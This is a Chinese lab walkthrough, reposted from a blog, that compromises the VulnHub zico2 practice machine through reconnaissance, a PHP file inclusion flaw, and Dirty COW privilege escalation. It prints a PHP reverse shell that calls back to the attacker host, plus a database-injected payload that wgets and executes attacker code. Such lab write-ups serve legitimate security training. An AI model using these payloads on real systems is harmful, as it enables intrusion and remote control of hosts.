kali渗透综合靶机(五)--zico2靶机

kali渗透综合靶机(五)--zico2靶机

靶机地址:https://www.vulnhub.com/series/zico2,137/#modal210download

一、主机发现

1.netdiscover -i eth0 -r 192.168.10.0/24

  

二、端口扫描

1.masscan --rate=10000 -p 0-65535 192.168.10.158

  

三、端口服务识别

1. nmap -sV -T4 -O 192.168.10.157 -p 22,80,111,60830

  

四、漏洞发现

1.访问http://192.168.10.158,发现http://192.168.10.158/view.php?page=tools.htm可能存在文件包含漏洞

  

2.测试是否存在文件包含漏洞,下图说明存在存在文件包含漏洞

  

3.扫描网站目录

dirb http://192.168.10.158

  

4.测试数据库是否可写内容,在数据库插入<? Phpinfo();?>,然后结合文件包含

  

然后结合文件包含

  

5.在攻击端写反弹脚本,然后在目标数据库中写入一段代码加载位于攻击端的代码,结合文件包含,然后在攻击端开启监听

攻击端代码:

<?php

$sock=fsockopen("192.168.10.151",4444);exec("/bin/sh -i <&3 >&3 2>&3");

?>

目标数据库插入代码:

<?php system("wget 192.168.10.151/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>

  

  

  

6.新建一个终端

python -c 'import pty;pty.spawn("/bin/bash")'

  

7.下载攻击端的dirty.c脚本

  

8. 然后编译并运行,然后切换firefart账户,获得管理员权限

  

 

总结:

1.信息收集

2.文件包含

3.脏牛提权

转载于:https://www.cnblogs.com/yuzly/p/10801231.html

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值